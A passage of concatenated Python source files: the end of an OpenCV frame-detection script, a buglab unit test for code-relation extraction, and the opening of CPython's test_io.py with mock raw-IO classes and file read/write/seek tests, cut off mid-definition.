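        # Give the reader thread a moment to notice the stop flag before the
        # capture device is released underneath it.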
time.sleep(.25)
self.cap.release()
if __name__ == "__main__":
d = Detector()
cap = VideoCapture(4)
while True:
frame = cap.read()
frame = d.detect(frame)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
cv2.imshow("frame", frame)
if chr(cv2.waitKey(5) & 0xFF) == 'q':
break
cap.close()
|
test_extraction.py
|
import json
import unittest
from pathlib import Path
from threading import Thread
from typing import Any, List, Tuple, Type
import jedi
import libcst as cst
from jedi.api.environment import Environment
from buglab.controllers.buggydatacreation import extract_bugs_from
from buglab.controllers.helper.randombugselectorserver import random_bug_selector_server
from buglab.representations.coderelations import compute_all_relations
from buglab.representations.codereprs import PythonCodeRelations
from buglab.rewriting import ALL_REWRITE_SCOUTS, filter_ops_in_range
from buglab.rewriting.rewriteops import AbstractRewriteOp
from buglab.rewriting.rewritescouts import ICodeRewriteScout
from buglab.utils.cstutils import AllFunctionFinder
from tests.utils import get_all_files_for_package, iterate_buglab_test_snippets
class TestExtraction(unittest.TestCase):
"""Download a friendly package and run
    representation extraction on that package."""
def _try_serialize_all(self, filepath: str, jedi_env: Environment):
print(filepath)
with open(filepath) as f:
code_text = f.read()
rel_db = PythonCodeRelations(code_text, Path(filepath))
compute_all_relations(rel_db, jedi_env)
function_finder = AllFunctionFinder()
rel_db.ast_with_metadata_wrapper.visit(function_finder)
available_ops: List[AbstractRewriteOp] = []
available_ops_metadata: List[Tuple[Type[ICodeRewriteScout], cst.CSTNode, Any]] = []
rel_db.ast_with_metadata_wrapper.visit_batched([ScoutClass(available_ops) for ScoutClass in ALL_REWRITE_SCOUTS])
for function, fn_pos in function_finder.all_function_nodes:
relevant_ops, relevant_op_metadata = filter_ops_in_range(available_ops, available_ops_metadata, fn_pos)
serializable, _ = rel_db.as_serializable(
target_range=fn_pos, reference_nodes=[node for _, node, _ in relevant_op_metadata]
)
_ = json.dumps(serializable)
self.__assert_tokens_are_fully_connected(serializable["edges"]["NextToken"])
def __assert_tokens_are_fully_connected(self, token_edges):
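        # The NextToken edges should form a single chain over the tokens:
        # exactly one token may lack an incoming edge (the first one). More
        # than one such token means the sequence is split into disconnected
        # pieces.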
next_token_edges = {f: t for f, t in token_edges}
first_token = set(next_token_edges.keys()) - set(next_token_edges.values())
self.assertEqual(len(first_token), 1, "The token sequence is disconnected.")
def test_extraction_on_dpu_utils(self):
for filepath, env in get_all_files_for_package("dpu-utils"):
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_extraction_on_azure_blob_storage(self):
for filepath, env in get_all_files_for_package("azure-storage-blob"):
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_extraction_on_test_snippets(self):
env = jedi.get_default_environment()
for filepath in iterate_buglab_test_snippets():
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_random_extraction_on_test_snippets(self):
env = jedi.get_default_environment()
rewrite_selector_server_port: str = "8345"
server_thread = Thread(
target=lambda: random_bug_selector_server("tcp://*:" + rewrite_selector_server_port), daemon=True
)
server_thread.start()
for filepath in iterate_buglab_test_snippets():
with self.subTest(f"Extracting on {filepath}", path=filepath):
all_p = extract_bugs_from(
filepath, env.path, "testsnippets", "0", "tcp://localhost:" + rewrite_selector_server_port
)
for extracted_fn in all_p:
for extracted_e, _ in extracted_fn["rewrites"].values():
self.__assert_tokens_are_fully_connected(extracted_e["graph"]["edges"]["NextToken"])
if __name__ == "__main__":
unittest.main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
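# A minimal illustrative sketch of that pattern (hypothetical names; this file
# wires the implementation attributes up differently, but the idea is the same):
#
#     class ExampleIOTest(unittest.TestCase):
#         def test_roundtrip(self):
#             buf = self.BytesIO()            # implementation under test
#             buf.write(b"spam")
#             self.assertEqual(buf.getvalue(), b"spam")
#
#     class CExampleIOTest(ExampleIOTest):
#         BytesIO = io.BytesIO                # C implementation
#
#     class PyExampleIOTest(ExampleIOTest):
#         BytesIO = pyio.BytesIO              # pure-Python implementation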
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
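        # A None entry simulates a raw stream that currently has no data
        # available (would block); signal that by returning None.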
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
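        # Each abilities string encodes what the object should support:
        # "f" = fileno(), "r" = readable, "w" = writable, "s" = seekable.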
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; it takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
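        # None entries in the read stack stand in for a stream that would
        # block; the default read() must return None for them, not b"".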
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
